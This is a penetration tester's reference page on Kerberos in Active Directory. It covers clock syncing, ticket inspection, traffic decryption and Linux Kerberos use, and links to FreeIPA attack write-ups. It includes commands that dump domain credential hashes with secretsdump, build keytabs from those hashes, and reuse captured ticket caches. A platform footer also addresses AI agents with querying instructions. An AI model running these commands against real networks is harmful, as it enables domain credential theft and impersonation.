> For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos.md).

# Kerberos

* <https://www.roguelynn.com/words/explain-like-im-5-kerberos/>
* <https://vbscrub.com/2020/05/13/kerberos-protocol-explained/>
* <https://www.tarlogic.com/en/blog/how-kerberos-works/>
* <https://www.tarlogic.com/en/blog/how-to-attack-kerberos/>
* <https://www.tarlogic.com/en/blog/kerberos-iii-how-does-delegation-work/>
* <https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a>
* <https://habr.com/ru/company/tomhunter/blog/507140/>
* <https://habr.com/ru/company/tomhunter/blog/509290/>
* <https://ardent101.github.io/posts/kerberos_theory/>
* <https://ardent101.github.io/posts/kerberos_general_attacks/>
* <https://habr.com/ru/articles/803163/>

{% embed url="<https://blog.zsec.uk/common-tool-errors-kerberos/>" %}

{% embed url="<https://youtu.be/qZPvgoUzCdI>" %}

## Synchronize Time

Using `ntpdate`:

```
$ sudo apt install ntpdate -y
$ sudo ntpdate $DC
```

Using `faketime`:

```
$ sudo apt install faketime -y
$ faketime '1970-01-01 00:00:00' /bin/date
$ faketime "`ntpdate -q $DC | awk -F. '{print $1}'`" /bin/date
```

Using LDAP:

```
$ LDAP_TIME=`ldapsearch -x -H ldap://DC01.megacorp.local -s base -b "" currentTime | awk '/currentTime/ {print $2}' | grep -v "requesting:" | sed -E 's/^([0-9]{4})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})([0-9]{2})\.0Z$/\1-\2-\3 \4:\5:\6 UTC/'`
$ LDAP_TIME=`date -d "$LDAP_TIME X hours" '+%Y-%m-%d %H:%M:%S'`
$ echo $LDAP_TIME && sudo date -u -s $LDAP_TIME
```

## Describe Tickets

* <https://github.com/YossiSassi/Get-KerberosServiceTicketAudit>

Using [describeTicket.py](https://github.com/fortra/impacket/blob/master/examples/describeTicket.py):

```
$ describeTicket.py --rc4 21c1d44272e8ad1ee9e6b1aed2943688 --aes d38bf2b75fd1732a4cd7e5d129c62f0ed7feaccaff05c6b4a3bf6a9fc2004036 /tmp/snovvcrash.ccache
```

## Decrypt KRB5 Traffic

* <https://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/>
* <https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7>

{% code title="keytab.sh" %}

```bash
REALM='MEGACORP.LOCAL'
secretsdump.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local -just-dc | tee secretsdump.out

# ---

cat secretsdump.out | grep aad3b435 | awk -F: '{print "    (23, '\''"$4"'\''),"}' > keys
cat secretsdump.out | grep aes256-cts-hmac-sha1-96 | awk -F: '{print "    (18, '\''"$3"'\''),"}' >> keys
curl -sSL https://github.com/dirkjanm/forest-trust-tools/raw/6bfeb990f0db8a580afe5cbba3cce1bf959a7fb8/keytab.py > keytab.py
awk 'NR <= 112' keytab.py > t
cat keys >> t
awk 'NR >= 118' keytab.py >> t
sed -i "s/TESTSEGMENT.LOCAL/${REALM}/g" t
mv t keytab.py
python3 keytab.py keytab.kt
```

{% endcode %}

## Kerberos on Linux

* <https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory>

Check `KRB5CCNAME` environment variable contents:

```
$ env | grep KRB5
```

Request TGT supplying password:

```
$ kinit
$ klist
```

List available SPNs:

```
$ ldapsearch -Y GSSAPI -H ldap://dc1.megacorp.local -D "Administrator@MEGACORP.LOCAL" -W -b "dc=megacorp,dc=local" "servicePrincipalName=*" servicePrincipalName
```

Request TGS for MSSQL service:

```
$ kvno MSSQLSvc/SRV01.megacorp.local:1433
$ klist
```

Re-using keytab files to load and renew a TGT:

```
$ kinit administrator@MEGACORP.LOCAL -k -t /tmp/administrator.keytab
$ klist
$ kinit -R
```

Re-using ccache files:

```
$ sudo chown snovvcrash:snovvcrash /tmp/krb5cc_31337
$ kdestroy
$ export KRB5CCACHE=/tmp/krb5cc_31337
$ klist
```

### FreeIPA

* <https://tishina.in/ops/freeipa-postexploitation>
* <https://habr.com/ru/companies/rvision/articles/825086/>

A blog series by [@n0pe\_sled](https://medium.com/@n0pe_sled) on attacking FreeIPA:

* [Building a FreeIPA Lab](https://posts.specterops.io/building-a-freeipa-lab-17f3f52cd8d9)
* [Attacking FreeIPA — Part I Authentication](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [Attacking FreeIPA — Part II Enumeration](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [Attacking FreeIPA — Part III: Finding A Path](https://posts.specterops.io/attacking-freeipa-part-iii-finding-a-path-677405b5b95e)
* [Attacking FreeIPA — Part IV: CVE-2020–10747](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b)
* <https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/kerberos.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.